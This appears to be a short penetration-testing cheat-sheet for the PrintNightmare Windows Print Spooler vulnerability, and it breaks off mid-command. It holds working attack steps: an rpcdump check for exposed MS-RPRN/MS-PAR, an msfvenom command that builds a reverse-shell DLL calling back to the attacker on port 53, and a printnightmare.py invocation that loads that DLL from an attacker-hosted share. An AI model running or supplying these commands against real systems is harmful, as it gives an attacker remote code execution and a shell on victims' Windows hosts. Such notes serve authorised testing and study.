rpcdump.py @$ip | egrep 'MS-RPRN|MS-PAR'
Print System Aschronous Remote Protocol
Print System Remote Protocol
msfvenom -p windows/x64/shell_reverse_tcp lhost=$tun0 lport=53 -f dll -o /opt/winreconpack/thescriptkid.dll
python3 printnightmare.py domain.local/user:password@$ip '\\$tun0\winreconpack\thescriptk